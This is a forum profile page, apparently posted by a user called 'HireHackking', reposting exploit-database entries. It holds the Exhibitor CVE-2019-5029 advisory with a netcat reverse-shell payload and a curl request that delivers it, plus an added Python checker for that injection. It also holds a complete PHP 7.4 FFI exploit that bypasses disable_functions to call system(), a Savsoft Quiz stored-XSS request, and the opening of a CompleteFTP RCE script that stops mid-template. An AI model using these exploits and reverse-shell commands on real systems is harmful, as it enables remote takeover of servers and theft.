
Everything posted by HireHackking
-
Exhibitor Web UI 1.7.1 - Remote Code Execution
# Exploit Title: Exhibitor Web UI 1.7.1 - Remote Code Execution
# Date: 2019-11-13
# Exploit Author: Logan Sanderson
# Web Site: https://github.com/soabase/exhibitor/wiki/Running-Exhibitor
# Version : 1.7.1
# CVE : CVE-2019-5029

Exhibitor UI command injection vulnerability
November 13, 2019

CVE Number
CVE-2019-5029

Summary
An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI, versions 1.0.9 to 1.7.1. Arbitrary shell commands surrounded by backticks or $() can be inserted into the editor and will be executed by the Exhibitor process when it launches ZooKeeper. An attacker can execute any command as the user running the Exhibitor process.

Tested Versions
The tested version was compiled using the standalone pom.xml from the Exhibitor master branch. (Note that the latest released version is labeled 1.7.1, but the version in exhibitor-standalone's pom.xml is set to 1.6.0.) The vulnerability should affect all versions at least as far back as 1.0.9, when the javaEnvironment variable was added.

Product URLs
https://github.com/soabase/exhibitor

CVSSv3 Score
9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE
CWE-78 - Improper Neutralization of Special Elements used in an OS Command

Details
Exhibitor is a ZooKeeper supervisory process, which is described in the ZooKeeper documentation. Since the ZooKeeper server will exit on an error, the Apache ZooKeeper documentation suggests a supervisory process that manages the ZooKeeper server process, mainly for the purpose of restarting ZooKeeper when it exits.

Exhibitor's Web UI does not have any form of authentication, and prior to version 1.7.0 did not have any way to specify which interfaces to listen on. Exposing Exhibitor is dangerous for the ZooKeeper ensemble because Exhibitor allows the ZooKeeper configuration to be changed, and also provides a UI for viewing and modifying keys and values stored in ZooKeeper.

By default, the Exhibitor Web UI listens on TCP 8080. However, since this port is commonly used by other services, it is also common to find Exhibitor on other ports.

Under the Config tab in the Exhibitor Web UI, the "java.env script" field can be modified and the new configuration pushed to ZooKeeper. Exhibitor launches ZooKeeper through a script, and the contents of this field are passed, unmodified, as arguments to the Java command that launches ZooKeeper, which can be seen in the Exhibitor source. (The contents of the "java.env script" field are passed in as $JVMFLAGS.) Because of how this argument is passed, there are several ways to execute arbitrary commands. The methods tested were surrounding the command with backticks and using $(), for example:

$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)

This example uses netcat to open a reverse shell to a listener on 10.0.0.64:4444. In the example, ZooKeeper will still launch successfully after the command executes, and the command will run every time ZooKeeper is re-launched by Exhibitor.

Exploit Proof of Concept
The included screenshots show the process of obtaining a root shell on the system. The steps to exploit it from a web browser:

1. Open the Exhibitor Web UI and click on the Config tab, then flip the Editing switch to ON.
2. In the "java.env script" field, enter any command surrounded by $() or ``, for example, for a simple reverse shell:
   $(/bin/nc -e /bin/sh 10.0.0.64 4444 &)
3. Click Commit > All At Once > OK.

The command may take up to a minute to execute.

It can also be performed with a single curl command:

command:
curl -X POST -d @data.json http://10.0.0.200:8080/exhibitor/v1/config/set

data.json:
{
  "zookeeperInstallDirectory": "/opt/zookeeper",
  "zookeeperDataDirectory": "/opt/zookeeper/snapshots",
  "zookeeperLogDirectory": "/opt/zookeeper/transactions",
  "logIndexDirectory": "/opt/zookeeper/transactions",
  "autoManageInstancesSettlingPeriodMs": "0",
  "autoManageInstancesFixedEnsembleSize": "0",
  "autoManageInstancesApplyAllAtOnce": "1",
  "observerThreshold": "0",
  "serversSpec": "1:exhibitor-demo",
  "javaEnvironment": "$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)",
  "log4jProperties": "",
  "clientPort": "2181",
  "connectPort": "2888",
  "electionPort": "3888",
  "checkMs": "30000",
  "cleanupPeriodMs": "300000",
  "cleanupMaxFiles": "20",
  "backupPeriodMs": "600000",
  "backupMaxStoreMs": "21600000",
  "autoManageInstances": "1",
  "zooCfgExtra": {
    "tickTime": "2000",
    "initLimit": "10",
    "syncLimit": "5",
    "quorumListenOnAllIPs": "true"
  },
  "backupExtra": {
    "directory": ""
  },
  "serverId": 1
}

Mitigation
Since Exhibitor has no built-in authentication, it would be helpful to limit the interfaces it listens on to only trusted networks, or to require authentication using something like an nginx reverse proxy and block all other access using firewall rules. If the features provided by the Exhibitor Web UI are not needed and the only required functionality is managing the ZooKeeper process, it should be replaced with a simpler ZooKeeper supervisor solution, such as a systemd service.

Timeline
2019-03-08 - Vendor Disclosure
2019-05-01 - GitHub issue #389 created; Vendor advised point of contact changed. Copy of report sent to new point of contact
2019-05-14 - (75 day) 3rd follow up with vendor
2019-05-29 - Final notice of public disclosure release
2019-11-13 - Public Release

Credit
Discovered by Logan Sanderson of Cisco ASIG.
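The injection the advisory describes comes down to shell metacharacters reaching $JVMFLAGS unchecked. As an added example (not part of the advisory or of Exhibitor), the following Python reviewer applies the check Exhibitor's config/set handler lacked to a posted config body, the kind of pre-filter an authenticating reverse proxy or a log-review script could run: the field names are the advisory's, the sample bodies are constructed, and the JVM-option pattern is an assumption to tune for your own deployment.

```python
"""Review an Exhibitor config/set body for shell injection in javaEnvironment.

Added example, not part of the advisory or of Exhibitor: the field names are
those of the advisory's data.json, the sample bodies below are constructed,
and the JVM-option pattern is an assumption about what a legitimate java.env
script contains. Exhibitor interpolates javaEnvironment unmodified into the
shell that launches ZooKeeper ($JVMFLAGS), so command substitution and other
shell metacharacters in that field are the injection vector.
"""
import json
import re
from typing import List

# Constructs the launching shell evaluates inside an unquoted or double-quoted
# expansion: command substitution ($( ) and backticks), parameter expansion,
# command separators, pipes, redirections and embedded newlines.
SHELL_METACHARS = re.compile(r"\$\(|`|\$\{|[;&|<>\n\r]")

# Conservative shape of one JVM option, e.g. -Xmx1g, -XX:+UseG1GC or
# -Dzookeeper.log.dir=/var/log/zk. Assumption: tighten or extend per fleet.
JVM_FLAG = re.compile(r"^-[A-Za-z0-9][A-Za-z0-9._:=+/,-]*$")


def review_java_env(value: str) -> List[str]:
    """Return findings for one javaEnvironment value; an empty list means clean."""
    findings = []
    hit = SHELL_METACHARS.search(value)
    if hit:
        findings.append(
            f"shell metacharacter {hit.group(0)!r} at offset {hit.start()}"
        )
    # Allowlist check: every whitespace-separated token must look like a JVM option.
    for token in value.split():
        if not JVM_FLAG.match(token):
            findings.append(f"token {token!r} is not a plain JVM option")
    return findings


def review_config_body(body: str) -> List[str]:
    """Review the raw JSON body of a POST to /exhibitor/v1/config/set."""
    try:
        cfg = json.loads(body)
    except json.JSONDecodeError as exc:
        return [f"body is not valid JSON: {exc.msg}"]
    if not isinstance(cfg, dict):
        return ["body is not a JSON object"]
    env = cfg.get("javaEnvironment", "")
    if not isinstance(env, str):
        return ["javaEnvironment is not a string"]
    return [f"javaEnvironment: {finding}" for finding in review_java_env(env)]


# Constructed sample bodies (a subset of the advisory's data.json fields).
BENIGN_BODY = json.dumps({
    "zookeeperInstallDirectory": "/opt/zookeeper",
    "serversSpec": "1:exhibitor-demo",
    "javaEnvironment": "-Xmx512m -Djava.net.preferIPv4Stack=true",
    "clientPort": "2181",
})
INJECTED_BODY = json.dumps({
    "zookeeperInstallDirectory": "/opt/zookeeper",
    "serversSpec": "1:exhibitor-demo",
    # Harmless marker command standing in for the advisory's payload.
    "javaEnvironment": "-Xmx512m $(id)",
    "clientPort": "2181",
})
BACKTICK_BODY = json.dumps({"javaEnvironment": "`id`"})


if __name__ == "__main__":
    for name, body in (("benign", BENIGN_BODY),
                       ("injected", INJECTED_BODY),
                       ("backtick", BACKTICK_BODY)):
        findings = review_config_body(body)
        print(f"{name}: {'ALLOW' if not findings else 'BLOCK'}")
        for finding in findings:
            print("   ", finding)
```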
-
PHP 7.4 FFI - 'disable_functions' Bypass
<?php
/*
FFI Exploit - uses 3 potential BUGS. PHP was contacted and said nothing in FFI is a security issue.

Able to call system($cmd) without using FFI::load() or FFI::cdefs()

* BUG #1 (maybe intended, but why have any size checks then?)
  no bounds check for FFI::String() when type is ZEND_FFI_TYPE_POINTER
  (https://github.com/php/php-src/blob/php-7.4.7RC1/ext/ffi/ffi.c#L4411)

* BUG #2 (maybe intended, but why have any checks then?)
  no bounds check for FFI::memcpy when type is ZEND_FFI_TYPE_POINTER
  (https://github.com/php/php-src/blob/php-7.4.7RC1/ext/ffi/ffi.c#L4286)

* BUG #3 Can walk back CDATA object to get a pointer to its internal reference pointer using FFI::addr()
  call FFI::addr on a CDATA object to get its pointer (also a CDATA object), then call FFI::addr on the
  resulting ptr to get a handle to its ptr, which is the ptr_holder for the original CDATA object

The easiest way is to create a cdata object, write the target RIP (zif_system's address) to it and finally
modify its zend_ffi_type_kind to ZEND_FFI_TYPE_FUNC to call it.

Exploit steps:
1. Use read/write to leak zif_system pointer
   a. walk cdata object to leak handlers pointer ( in .bss )
   b. scan .bss for pointer to a known value ( *.rodata ptr), that we know usually sits right below
      a pointer to the .data.relro segment
   c. Increment and read the .data.relro pointer to get a relro section leak
   d. Using the relro section leak, scan up memory looking for the 'system' string that is inside
      the zif_system relro entry.
   e. once found, increment and leak the zif_system pointer
2. Hijack RIP with complete argument control
   a. create a function pointer CDATA object using FFI::new() [not callable as it is technically not
      a proper ZEND_FFI_TYPE_FUNC since it wasn't made with FFI::cdef()]
   b. Overwrite the object's data with zif_system pointer
   c. Overwrite the object's zend_ffi_type_kind with ZEND_FFI_TYPE_FUNC so that it is callable with our own arguments
3. Create proper argument object to pass to zif_system (zend_execute_data .. )
   a. Build out the zend_execute_data object in a php string
   b. right after the object is the argument object itself (zval) which we must also build. To do so we
      build our PHP_STRING in another FFI buffer, leak the pointer and place it into a fake zval STRING object.
   c. finally we can call zif_system with a controlled argument

NOTE: does NOT exit cleanly nor give command output -- both may be possible

Author: Hunter Gregal
Tested on:
  - PHP 7.4.7 x64 Ubuntu 20, ./configure --disable-all --with-ffi
  - PHP 7.4.3 x64 Ubuntu 20 (apt install)
*/

ini_set("display_errors", "On");
error_reporting(E_ALL);

function pwn($cmd) {

    function allocate($amt, $fill) {
        // could do $persistent = TRUE to alloc on libc malloc heap instead
        // but we already have a good read/write primitive
        // and relying on libc leaks for gadgets is not very portable
        // (custom compiled libc -> see pornhub php 0-day)
        $buf = FFI::new("char [".$amt."]");
        $bufPtr = FFI::addr($buf);
        FFI::memset($bufPtr, $fill, $amt);
        // not sure if i need to keep the CData reference alive
        // or not - but just in case return it too for now
        return array($bufPtr, $buf);
    }

    // uses leak to leak data from FFI ptr
    function leak($ptr, $n, $hex) {
        if ( $hex == 0 ) {
            return FFI::string($ptr, $n);
        } else {
            return bin2hex(FFI::string($ptr, $n));
        }
    }

    function ptrVal($ptr) {
        $tmp = FFI::cast("uint64_t", $ptr);
        return $tmp->cdata;
    }

    /* Read primitive
       writes target address overtop of CDATA object pointer, then leaks directly from the CDATA object */
    function Read($addr, $n = 8, $hex = 0) {
        // Create vulnBuf which we walk back to do the overwrite
        // (the size and contents dont really matter)
        list($vulnBufPtr, $vulnBuf) = allocate(1, 0x42); // B*8
        // walk back to get ptr to ptr (heap)
        $vulnBufPtrPtr = FFI::addr($vulnBufPtr);
        /*// DEBUG
        $vulnBufPtrVal = ptrVal($vulnBufPtr);
        $vulnBufPtrPtrVal = ptrVal($vulnBufPtrPtr);
        printf("vuln BufPtr = %s\n", dechex($vulnBufPtrVal));
        printf("vuln BufPtrPtr = %s\n", dechex($vulnBufPtrPtrVal));
        printf("-------\n\n");
        */
        // Overwrite the ptr
        $packedAddr = pack("Q",$addr);
        FFI::memcpy($vulnBufPtrPtr, $packedAddr, 8);
        // Leak the overwritten ptr
        return leak($vulnBufPtr, $n, $hex);
    }

    /* Write primitive
       writes target address overtop of CDATA object pointer, then writes directly to the CDATA object */
    function Write($addr, $what, $n) {
        // Create vulnBuf which we walk back to do the overwrite
        // (the size and contents dont really matter)
        list($vulnBufPtr, $vulnBuf) = allocate(1, 0x42); // B*8
        // walk back to get ptr to ptr (heap)
        $vulnBufPtrPtr = FFI::addr($vulnBufPtr);
        /*// DEBUG
        $vulnBufPtrVal = ptrVal($vulnBufPtr);
        $vulnBufPtrPtrVal = ptrVal($vulnBufPtrPtr);
        printf("vuln BufPtr = %s\n", dechex($vulnBufPtrVal));
        printf("vuln BufPtrPtr = %s\n", dechex($vulnBufPtrPtrVal));
        printf("-------\n\n");
        */
        // Overwrite the ptr
        $packedAddr = pack("Q",$addr);
        FFI::memcpy($vulnBufPtrPtr, $packedAddr, 8);
        // Write to the overwritten ptr
        FFI::memcpy($vulnBufPtr, $what, $n);
    }

    function isPtr($knownPtr, $testPtr) {
        if ( ($knownPtr & 0xFFFFFFFF00000000) == ($testPtr & 0xFFFFFFFF00000000)) {
            return 1;
        } else {
            return 0;
        }
    }

    /* Walks looking for valid pointers
     * - each valid ptr is read and if it
     * - points to the target return the address of the
     * - ptr and the location it was found
     */
    //function getRodataAddr($bssLeak) {
    function walkSearch($segmentLeak, $maxQWORDS, $target, $size = 8, $up = 0) {
        $start = $segmentLeak;
        for($i = 0; $i < $maxQWORDS; $i++) {
            if ( $up == 0 ) {
                // walk 'down' addresses
                $addr = $start - (8 * $i);
            } else {
                // walk 'up' addresses
                $addr = $start + (8 * $i);
            }
            //$leak = Read($addr, 8);
            $leak = unpack("Q", Read($addr))[1];
            // skip if its not a valid pointer...
            if ( isPtr($segmentLeak, $leak) == 0 ) {
                continue;
            }
            $leak2 = Read($leak, $n = $size);
            //printf("0x%x->0x%x = %s\n", $addr, $leak, $leak2);
            if( strcmp($leak2, $target) == 0 ) { # match
                return array ($leak, $addr);
            }
        }
        return array(0, 0);
    }

    function getBinaryBase($textLeak) {
        $start = $textLeak & 0xfffffffffffff000;
        for($i = 0; $i < 0x10000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = Read($addr, 7);
            //if($leak == 0x10102464c457f) { # ELF header
            if( strcmp($leak, "\x7f\x45\x4c\x46\x02\x01\x01") == 0 ) { # ELF header
                return $addr;
            }
        }
        return 0;
    }

    function parseElf($base) {
        $e_type = unpack("S", Read($base + 0x10, 2))[1];
        $e_phoff = unpack("Q", Read($base + 0x20))[1];
        $e_phentsize = unpack("S", Read($base + 0x36, 2))[1];
        $e_phnum = unpack("S", Read($base + 0x38, 2))[1];
        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type = unpack("L", Read($header, 4))[1];
            $p_flags = unpack("L", Read($header + 4, 4))[1];
            $p_vaddr = unpack("Q", Read($header + 0x10))[1];
            $p_memsz = unpack("Q", Read($header + 0x28))[1];
            if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
                # handle pie
                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
                $text_size = $p_memsz;
            }
        }
        if(!$data_addr || !$text_size || !$data_size)
            return false;
        return [$data_addr, $text_size, $data_size];
    }

    function getBasicFuncs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = unpack("Q", Read($data_addr+ ($i * 8)))[1];
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = unpack("Q", Read($leak))[1];
                # 'constant' constant check
                if($deref != 0x746e6174736e6f63)
                    continue;
            } else continue;
            $leak = unpack("Q", Read($data_addr + (($i + 4) * 8)))[1];
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = unpack("Q", Read($leak))[1];
                # 'bin2hex' constant check
                if($deref != 0x786568326e6962)
                    continue;
            } else continue;
            return $data_addr + $i * 8;
        }
    }

    function getSystem($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = unpack("Q", Read($addr))[1];
            $f_name = Read($f_entry, 6) . "\0";
            if( strcmp($f_name, "system\0") == 0) { # system
                return unpack("Q", Read($addr + 8))[1];
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }

    // Convenient for debugging
    function crash() {
        Write(0x0, "AAAA", 4);
    }

    printf("\n[+] Starting exploit...\n");

    // --------------------------- start of leak zif_system address
    /* NOTE: typically we would leak a .text address and walk backwards to find the ELF header.
       From there we can parse the elf information to resolve zif_system - in our case the base PHP
       binary image with the ELF header is on its own mapping that does not border the .text segment.
       So we need a creative way to get zif_system */

    /* ---- First, we use our read to walk back to our Zend_object,
    // and get its zend_object_handlers* which will point to the
    // php binary symbol zend_ffi_cdata_handlers in the .bss.
    //
    //_zend_ffi_cdata.ptr_holder - _zend_ffi_cdata.ptr.std.handlers == 6 QWORDS
    //
    // From there we search for a ptr to a known value (happens to be to the .rodata section)
    // that just so happens to sit right below a ptr to the 'zend_version' relro entry.
    // So we do some checks on that to confirm it is in fact a valid ptr to the .data.relro.
    //
    // Finally we walk UP the relro entries looking for the 'system' (zif_system) entry.

    (zend_types.h)
    struct _zend_object {                          <----- typedef zend_object
        zend_refcounted_h gc;
        uint32_t handle;                           // may be removed ???
        zend_class_entry *ce;
        const zend_object_handlers *handlers;      <--- func ptrs
        HashTable *properties;
        zval properties_table[1];
    };

    (ffi.c)
    typedef struct _zend_ffi_cdata {
        zend_object std;
        zend_ffi_type *type;
        void *ptr;                                 <--- OVERWRITE
        void *ptr_holder;                          <--
        zend_ffi_flags flags;
    } zend_ffi_cdata;
    */
    list($dummyPtr, $dummy) = allocate(64, 0x41);
    // dummy buf ptr
    $dummyPtrVal = ptrVal($dummyPtr);
    // dummy buf ptr ptr
    $dummyPtrPtr = FFI::addr($dummyPtr);
    $dummyPtrPtrVal = ptrVal($dummyPtrPtr);
    printf("Dummy BufPtr = 0x%x\n", $dummyPtrVal);
    printf("Dummy BufPtrPtr = 0x%x\n", $dummyPtrPtrVal);
    $r = leak($dummyPtr, 64, 1);
    printf("Dummy buf:\n%s\n", $r);
    printf("-------\n\n");

    /*
    // ------ Test our read and write
    $r = Read($dummyPtrVal, 256, 1);
    printf("Read Test (DummyBuf):\n%s\n", $r);
    Write($dummyPtrVal, "CCCCCCCC", 8);
    $r = Read($dummyPtrVal, 256, 1);
    printf("Write Test (DummyBuf):\n%s\n", $r);
    // ----------
    */

    $handlersPtrPtr = $dummyPtrPtrVal - (6 * 8);
    printf("_zend_ffi_cdata.ptr.std.handlers = 0x%x\n", $handlersPtrPtr);
    $handlersPtr = unpack("Q", Read($handlersPtrPtr))[1]; // --> zend_ffi_cdata_handlers -> .bss
    printf("zend_ffi_cdata_handlers = 0x%x\n", $handlersPtr);

    // Find our 'known' value in the .rodata section -- in this case 'CORE'
    // (backup can be 'STDIO')
    list($rodataLeak, $rodataLeakPtr) = walkSearch($handlersPtr, 0x400, "Core", $size=4);
    if ( $rodataLeak == 0 ) {
        // If we failed let's just try to find PHP's base and hope for the best
        printf("Get rodata addr failed...trying for last ditch effort at PHP's ELF base\n");
        // use .text leak
        $textLeak = unpack("Q", Read($handlersPtr+16))[1]; // zend_objects_destroy_object
        printf(".textLeak = 0x%x\n", $textLeak);
        $base = getBinaryBase($textLeak);
        if ( $base == 0 ) {
            die("Failed to get binary base\n");
        }
        printf("BinaryBase = 0x%x\n", $base);
        // parse elf
        if (!($elf = parseElf($base))) {
            die("failed to parseElf\n");
        }
        if (!($basicFuncs = getBasicFuncs($base, $elf))) {
            die("failed to get basic funcs\n");
        }
        if (!($zif_system = getSystem($basicFuncs))) {
            die("Failed to get system\n");
        }
        // XXX HERE XXX
        //die("Get rodata addr failed\n");
    } else {
        printf(".rodata leak ('CORE' ptr) = 0x%x->0x%x\n", $rodataLeakPtr, $rodataLeak);
        // Right after the "Core" ptrptr is zend_version's relro entry - XXX this may not be static
        // zend_version is in .data.rel.ro
        $dataRelroPtr = $rodataLeakPtr + 8;
        printf("PtrPtr to 'zend_version' relro entry: 0x%x\n", $dataRelroPtr);
        // Read the .data.relro ptr
        $dataRelroLeak = unpack("Q", Read($dataRelroPtr))[1];
        if ( isPtr($dataRelroPtr, $dataRelroLeak) == 0 ) {
            die("bad zend_version entry pointer\n");
        }
        printf("Ptr to 'zend_version' relro entry: 0x%x\n", $dataRelroLeak);
        // Confirm this is a ptrptr to zend_version
        $r = unpack("Q", Read($dataRelroLeak))[1];
        if ( isPtr($dataRelroLeak, $r) == 0 ) {
            die("bad zend_version entry pointer\n");
        }
        printf("'zend_version' string ptr = 0x%x\n", $r);
        $r = Read($r, $n = 12);
        if ( strcmp($r, "zend_version") ) {
            die("Failed to find zend_version\n");
        }
        printf("[+] Verified data.rel.ro leak @ 0x%x!\n", $dataRelroLeak);

        /* Walk FORWARD the .data.rel.ro segment looking for the zif_system entry
           - this is a LARGE section... */
        list($systemStrPtr, $systemEntryPtr) = walkSearch($dataRelroLeak, 0x3000, "system", $size = 6, $up = 1);
        if ( $systemEntryPtr == 0 ) {
            die("Failed to find zif_system relro entry\n");
        }
        printf("system relro entry = 0x%x\n", $systemEntryPtr);
        $zif_systemPtr = $systemEntryPtr + 8;
        $r = unpack("Q", Read($zif_systemPtr))[1];
        if ( isPtr($zif_systemPtr, $r) == 0 ) {
            die("bad zif_system pointer\n");
        }
        $zif_system = $r;
    }
    printf("[+] zif_system @ 0x%x\n", $zif_system);
    // --------------------------- end of leak zif_system address

    // --------------------------- start call zif_system
    /* To call system in a controlled manner the easiest way is to create a cdata object,
       write the target RIP (zif_system's address) to it and finally modify its zend_ffi_type_kind
       to ZEND_FFI_TYPE_FUNC to call it */
    $helper = FFI::new("char* (*)(const char *)");
    //$helper = FFI::new("char* (*)(const char *, int )"); // XXX if we want return_val control
    $helperPtr = FFI::addr($helper);
    //list($helperPtr, $helper) = allocate(8, 0x43);
    //$x[0] = $zif_system;
    $helperPtrVal = ptrVal($helperPtr);
    $helperPtrPtr = FFI::addr($helperPtr);
    $helperPtrPtrVal = ptrVal($helperPtrPtr);
    printf("helper.ptr_holder @ 0x%x -> 0x%x\n", $helperPtrPtrVal, $helperPtrVal);

    // Walk the type pointers
    //$helperObjPtr = $helperPtrPtrVal - (9 *8); // to top of cdata object
    //printf("helper CDATA object @ 0x%x\n", $helperObjPtr);
    $helperTypePtrPtr = $helperPtrPtrVal - (2 *8); // 2 QWORDS up the struct to *type ptr
    //printf("helper CDATA type PtrPtr @ 0x%x\n", $helperTypePtrPtr);
    $r = unpack("Q", Read($helperTypePtrPtr))[1];
    if ( isPtr($helperTypePtrPtr, $r) == 0 ) {
        die("bad helper type pointer\n");
    }
    $helperTypePtr = $r;
    // Confirm it's currently ZEND_FFI_TYPE_VOID (0)
    $r = Read($helperTypePtr, $n=1, $hex=1);
    if ( strcmp($r, "00") ) {
        die("Unexpected helper type!\n");
    }
    printf("Current helper CDATA type @ 0x%x -> 0x%x -> ZEND_FFI_TYPE_VOID (0)\n", $helperTypePtrPtr, $helperTypePtr);
    // Set it to ZEND_FFI_TYPE_FUNC (16 w/ HAVE_LONG_DOUBLE else 15)
    Write($helperTypePtr, "\x10", 1);
    printf("Swapped helper CDATA type @ 0x%x -> 0x%x -> ZEND_FFI_TYPE_FUNC (16)\n", $helperTypePtrPtr, $helperTypePtr);
    // Finally write zif_system to the value
    Write($helperPtrVal, pack("Q", $zif_system), 8);
    // --------------------------- end of hijacking the helper's function pointer

    // ----------------------- start of build zif_system argument
    /* zif_system takes 2 args -> zif_system(*zend_execute_data, return_val)
       For now I don't bother with the return_val, although technically we could control it
       and potentially exit cleanly */

    // ----------- start of setup zend_execute_data object
    /* Build valid zend_execute object
    struct _zend_execute_data {
        const zend_op       *opline;            /* executed opline
        zend_execute_data   *call;              /* current call
        zval                *return_value;
        zend_function       *func;              /* executed function
        zval                 This;              /* this + call_info + num_args
        zend_execute_data   *prev_execute_data;
        zend_array          *symbol_table;
        void               **run_time_cache;    /* cache op_array->run_time_cache
    }; //0x48 bytes
    */
    //This.u2.num_args MUST == our number of args (1 or 2 apparently..) [6th QWORD in execute_data]
    $execute_data = str_shuffle(str_repeat("C", 5*8)); // 0x28 C's
    $execute_data .= pack("L", 0); // this.u1.type
    $execute_data .= pack("L", 1); // this.u2.num_args
    $execute_data .= str_shuffle(str_repeat("A", 0x18)); // fill out rest of zend_execute obj
    $execute_data .= str_shuffle(str_repeat("D", 8)); //padding
    // ----------- end of setup zend_execute_data object

    // ----------- start of setup argument object
    /* the ARG (zval) object lays after the execute_data object
    zval {
        value = *cmdStr ([16 bytes] + [QWORD string size] + [NULL terminated string])
        u1.type = 6 (IS_STRING)
        u2.???? = [unused]
    }
    */
    /*
    // Let's get our target command setup in a controlled buffer
    // TODO - use the dummy buf?
    // the string itself is odd. it has 16 bytes prepended to it that idk what it is
    // the whole argument after the zend_execute_data object looks like
    */
    $cmd_ = str_repeat("X", 16); // unk padding
    $cmd_ .= pack("Q", strlen($cmd)); // string len
    $cmd_ .= $cmd . "\0"; // ensure null terminated!
    list($cmdBufPtr, $cmdBuf) = allocate(strlen($cmd_), 0);
    $cmdBufPtrVal = ptrVal($cmdBufPtr);
    FFI::memcpy($cmdBufPtr, $cmd_, strlen($cmd_));
    printf("cmdBuf Ptr = 0x%x\n", $cmdBufPtrVal);

    // Now setup the zval object itself
    $zval = pack("Q", $cmdBufPtrVal); // zval.value (pointer to cmd string)
    $zval .= pack("L", 6); // zval.u1.type (IS_STRING [6])
    $zval .= pack("L", 0); // zval.u2 - unused
    $execute_data .= $zval;
    // ---------- end of setup argument object
    // ----------------------- end of build zif_system argument

    $res = $helper($execute_data);
    //$return_val = 0x0; // XXX if we want return_val control
    //$res = $helper($execute_data, $return_val); // XXX if we want return_val control
    // --------------------------- end of call zif_system
}

pwn("touch /tmp/WIN2.txt");
?>
-
Savsoft Quiz 5 - Persistent Cross-Site Scripting
# Exploit Title: Savsoft Quiz 5 - Persistent Cross-Site Scripting
# Date: 2020-07-09
# Exploit Author: Ogulcan Unveren (th3d1gger)
# Vendor Homepage: https://savsoftquiz.com/
# Software Link: https://github.com/savsofts/savsoftquiz_v5.git
# Version: 5.0
# Tested on: Kali Linux

---Vulnerable Source Code----

function insert_user_2(){
    $userdata=array(
        'email'=>$this->input->post('email'),
        'password'=>md5($this->input->post('password')),
        'first_name'=>$this->input->post('first_name'),
        'last_name'=>$this->input->post('last_name'),
        'contact_no'=>$this->input->post('contact_no'),
        'gid'=>implode(',',$this->input->post('gid')),
        'su'=>'2'
    );
    $veri_code=rand('1111','9999');
    if($this->config->item('verify_email')){
        $userdata['verify_code']=$veri_code;
    }
    if($this->session->userdata('logged_in_raw')){
        $userraw=$this->session->userdata('logged_in_raw');
        $userraw_uid=$userraw['uid'];
        $this->db->where('uid',$userraw_uid);
        $rresult=$this->db->update('savsoft_users',$userdata);
        if($this->session->userdata('logged_in_raw')){
            $this->session->unset_userdata('logged_in_raw');
        }
    }else{
        $rresult=$this->db->insert('savsoft_users',$userdata);
        $uid=$this->db->insert_id();
        foreach($_POST['custom'] as $ck => $cv){
            if($cv != ''){
                $savsoft_users_custom=array(
                    'field_id'=>$ck,
                    'uid'=>$uid,
                    'field_values'=>$cv
                );
                $this->db->insert('savsoft_users_custom',$savsoft_users_custom);
            }
        }

----Vulnerable Request---

POST /index.php/login/insert_user/ HTTP/1.1
Host: savsoftquiz_v5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2/index.php/login/registration/
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
Connection: close
Cookie: ci_session=0lhlr1iv1qgru1u1kmg42lbvj8mprokv
Upgrade-Insecure-Requests: 1

email=hello%40gmail.com&password=password&first_name=XSSPAYLOAD&last_name=test&contact_no=05785555555&gid%5B%5D=1
-
CompleteFTP Professional 12.1.3 - Remote Code Execution
# Exploit Title: CompleteFTP Professional < 12.1.3 - Remote Code Execution
# Date: 2020-03-11
# Exploit Author: 1F98D
# Original Author: Rhino Security Labs
# Vendor Homepage: https://enterprisedt.com/products/completeftp/
# Version: CompleteFTP Professional
# Tested on: Windows 10 (x64)
# CVE: CVE-2019-16116
# References:
# https://rhinosecuritylabs.com/application-security/completeftp-server-local-privesc-cve-2019-16116/
# https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2019-16116
#
# CompleteFTP before 12.1.3 logs an obscured administrator password to a file
# during installation (C:\Program Files (x86)\Complete FTP\Server\Bootstrapper.log).
# If CompleteFTP is configured to permit remote administration (over port 14983), it
# is possible to obtain remote code execution through the administration interface.
#
# This script requires the following python modules to be installed:
# pip install paramiko pycryptodome uuid
#

#!/usr/local/bin/python3

from paramiko.sftp import CMD_EXTENDED
from base64 import b64encode, b64decode
from Crypto.Util.Padding import unpad
from Crypto.Cipher import DES3
import xml.etree.ElementTree as ET
import paramiko
import struct
import uuid
import sys

# region get_server_info
get_server_info = """
<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xsd="http://www.w3.org/2001/XMLSchema"
                   xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
                   xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0"
                   SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <SOAP-ENV:Body>
    <i2:GetServerInfo id="ref-1" xmlns:i2="Admin API">
    </i2:GetServerInfo>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
""".strip()
# endregion

# region update_config
update_config = """
<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xsd="http://www.w3.org/2001/XMLSchema"
                   xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
                   xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
